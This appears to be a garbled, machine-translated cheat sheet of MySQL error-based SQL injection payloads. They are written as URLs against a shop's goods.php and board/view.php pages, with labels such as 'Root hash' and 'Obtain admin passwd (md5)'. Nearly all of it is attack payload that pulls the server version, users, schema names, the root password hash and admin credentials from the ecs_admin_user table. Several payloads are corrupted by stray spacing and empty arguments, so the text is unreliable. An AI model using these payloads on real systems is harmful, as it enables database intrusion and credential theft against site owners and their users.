And (select 1 from (select count (*), concat (select distinct concat (0x7e, 0x27, Hex (cast (table_name as char )), 0x27, 0x7e) FROM information_schema.tables Where table_schema = limit) from information_schema.tables limit), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1
Concat floor (rand (0) * 2) If group by exists, mysql may report an error.
Judge version number
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Judgment System
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version_compile_ OS % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current user ()
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 user () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current database ()
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 database () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Root hash
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 Password % 20 from % 20mysql. user % 20 where % 20 User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current Database Table Name
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20TABLE_NAME % 20% 20 from % 20information_schema.tables % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20 limit % 206,1), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
User_name field of the current database
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 202,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Password of the current database Field
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 204,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Obtain admin passwd (md5)
Http://www.bkjia.com/goods.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20concat_ws (char (94 ), ifnull (cast (% 60 password % 60% 20as % 20 char), char (32), ifnull (cast (% 60user_name % 60% 20as % 20 char ), char (32) % 20% 20 from % 20sansan1. ecs_admin_user % 20 limit % 201%), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 202 20 union % 20 select %) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Exp: http://www.bkjia.com/shop/board/view.php? Id = pnotes & no = 33% 20and (select % 201% 20 from (select % 20 count (*), concat (select % 20 (select % 20 (SELECT % 20 distinct % 20 concat (0x7e, 0x27, Hex (cast (table_name % 20as % 20 char )), 0x27, 0x7e) % 20 FROM % 20information_schema.tables % 20 Where % 20table_schema = limit % 20 limit % ,,1) % 20 from % 20information_schema.tables % 20 limit % 200,1 ), floor (rand (0) * 2) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x) a) % 20and % 201 = 1